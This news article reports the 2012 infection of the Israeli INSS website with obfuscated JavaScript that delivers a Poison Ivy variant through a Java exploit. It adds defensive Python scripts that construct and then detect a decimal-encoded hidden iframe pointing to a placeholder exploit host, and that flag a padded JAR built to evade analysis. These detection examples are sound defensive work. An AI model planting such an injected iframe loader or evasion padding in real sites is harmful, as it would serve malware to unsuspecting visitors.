Website infection hits Israeli Institute for National Security Studies

04 May 2012

Israeli websites frequently come under cyber attack. Now Websense reports that the website of the Israeli Institute for National Security Studies (INSS) has been infected with malicious code that ultimately delivers a Poison Ivy variant.

The malicious code, found on the home page, is injected into a table as a JavaScript document.write call that writes out an iframe; the exploit URL inside the iframe is obfuscated as a decimal-encoded string. The effect is that the visitor's browser is covertly redirected to the exploit while the legitimate page is still loading.
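The kind of check a site owner or responder can run against a saved copy of a page, as an added example (it is not Websense's code and not the injected code from the INSS site): it locates document.write calls whose argument is a decimal-encoded String.fromCharCode list, decodes them, and reports any iframe they produce together with whether it is sized or styled to be invisible. The sample page, the hostname and the attribute names are constructed for the example; the real injected code and URL are not reproduced on this page.

```python
import re

# Constructed page fragment: a table cell carrying a document.write of a
# decimal-encoded iframe, modelled on the technique described above.
# The host "exploit.example" is a placeholder, not the real exploit URL.
_HIDDEN_IFRAME = ('<iframe src="http://exploit.example/test.jar" '
                  'width="0" height="0" style="visibility:hidden"></iframe>')


def encode_decimal(text):
    """Return the String.fromCharCode(...) argument list for `text`."""
    return ",".join(str(ord(c)) for c in text)


SAMPLE_PAGE = (
    "<html><body><table><tr><td>Welcome to the site</td></tr>"
    "<tr><td><script>document.write(String.fromCharCode("
    + encode_decimal(_HIDDEN_IFRAME)
    + "));</script></td></tr></table></body></html>"
)

# document.write(String.fromCharCode(60,105,...)) with optional whitespace.
WRITE_RE = re.compile(
    r"document\.write\(\s*String\.fromCharCode\(([\d\s,]+)\)\s*\)", re.I)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"\bsrc\s*=\s*[\"']([^\"']+)[\"']", re.I)
HIDDEN_RE = re.compile(
    r"\b(?:width|height)\s*=\s*[\"']?0\b|visibility\s*:\s*hidden|display\s*:\s*none",
    re.I)


def decode_decimal(arg_list):
    """Decode a comma-separated list of decimal char codes back to text."""
    return "".join(chr(int(n)) for n in arg_list.split(",") if n.strip())


def find_obfuscated_iframes(page):
    """Return [(src, hidden)] for every iframe produced by a decoded
    document.write(String.fromCharCode(...)) call in `page`."""
    hits = []
    for call in WRITE_RE.finditer(page):
        decoded = decode_decimal(call.group(1))
        for tag in IFRAME_RE.findall(decoded):
            src = SRC_RE.search(tag)
            hits.append((src.group(1) if src else None,
                         bool(HIDDEN_RE.search(tag))))
    return hits


if __name__ == "__main__":
    for src, hidden in find_obfuscated_iframes(SAMPLE_PAGE):
        print(f"decoded iframe -> {src} (hidden={hidden})")
```

A page whose only iframe appears after decoding a character-code list is worth a second look even when the destination is not yet on any blocklist, which was exactly the situation the VirusTotal figure below describes.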

The obfuscated encoding is not the only evasion technique the attacker uses. The exploit file, test.jar (a Java ARchive), contains both the exploit and a large compressed file that expands to 104 MB of repeated ‘a’ characters. “We think that this is a technique that attempts to evade automated malware analysis technologies,” writes Websense, “since some of those systems typically avoid downloading the contents of big files, because malware tends to be small in size.”
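Padding of this kind is cheap to spot before anything is executed, because a file of one repeated byte compresses almost perfectly inside the archive. The following triage script is an added example, not Websense's tooling and not the real test.jar: it builds a small constructed JAR in memory (a placeholder entry standing in for the exploit class and a 4 MiB run of ‘a’ standing in for the 104 MB file), then walks the central directory and flags entries whose unpacked size and compression ratio are out of proportion, confirming the suspicion by reading only the first few kilobytes of the entry rather than inflating it.

```python
import io
import zipfile

# Constructed stand-in for the archive described above. The class bytes are a
# placeholder (a class-file magic number followed by filler), not real
# bytecode, and the padding is 4 MiB rather than 104 MB to keep the example
# quick; the detection logic does not depend on the absolute size.
PADDING_NAME = "padding.dat"


def build_sample_jar():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("Exploit.class", b"\xca\xfe\xba\xbe" + bytes(range(256)) * 8)
        jar.writestr(PADDING_NAME, b"a" * (4 * 1024 * 1024))
    return buf.getvalue()


def triage_jar(data, ratio_threshold=100.0, min_unpacked=1024 * 1024, peek=4096):
    """Return (total_unpacked_bytes, findings) for a JAR held in `data`.

    A finding is (name, unpacked, compressed, ratio, single_byte) for each
    entry that is at least `min_unpacked` bytes once inflated and compresses
    by at least `ratio_threshold`:1. `single_byte` is True when the first
    `peek` bytes of the entry are all the same value, the signature of the
    'aaaa...' filler the article describes.
    """
    findings = []
    total_unpacked = 0
    with zipfile.ZipFile(io.BytesIO(data)) as jar:
        for info in jar.infolist():
            total_unpacked += info.file_size
            if info.compress_size == 0:
                continue
            ratio = info.file_size / info.compress_size
            if info.file_size >= min_unpacked and ratio >= ratio_threshold:
                with jar.open(info) as fh:
                    head = fh.read(peek)  # read a prefix only; never inflate all of it
                findings.append((info.filename, info.file_size,
                                 info.compress_size, round(ratio),
                                 len(set(head)) == 1))
    return total_unpacked, findings


if __name__ == "__main__":
    blob = build_sample_jar()
    total, hits = triage_jar(blob)
    print(f"archive on disk: {len(blob)} bytes, unpacked: {total} bytes")
    for name, unpacked, packed, ratio, mono in hits:
        print(f"suspicious entry {name}: {unpacked} -> {packed} bytes "
              f"({ratio}:1), single repeated byte={mono}")
```

The useful lesson for a sandbox operator is the converse of the attacker's assumption: decide whether to fetch and analyse a file on its on-disk size, which here is a few kilobytes, and treat an unpacked size that is orders of magnitude larger as a reason to look harder rather than to skip the sample.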

The exploit itself uses the same Java vulnerability behind the recent rash of Flashback infections. If it succeeds, it installs a variant of Poison Ivy, a remote administration tool (RAT) that gives the command-and-control server complete remote control of the infected computer.

“We have contacted the Webmaster of the website,” said Websense, “and notified them of the issue and the location of the injected code on the website; so far, we haven't heard back from them.” At the time of writing, VirusTotal reported that just one of 24 URL scanners flagged the URL as a ‘malware site’, so the site should be treated with caution. However, since the delivered malware is no longer new, most AV products can detect and remove it, and the latest versions of Java are patched against the vulnerability.

What isn’t certain, however, is whether INSS was specifically targeted by hackers, or just caught in a wider dragnet. “We don't have any information on where the threat originated,” Sophos senior technology consultant Graham Cluley told Infosecurity, “or whether it was targeted against the Israeli website. However, we do see attacks like this on many other websites, so it is very possible that there is a chance that it was affected.” Websense doesn’t believe “that this latest infection is part of an organized mass infection campaign,” but similarly “can't determine that the infection of this website with exploit code is part of a targeted attack.”
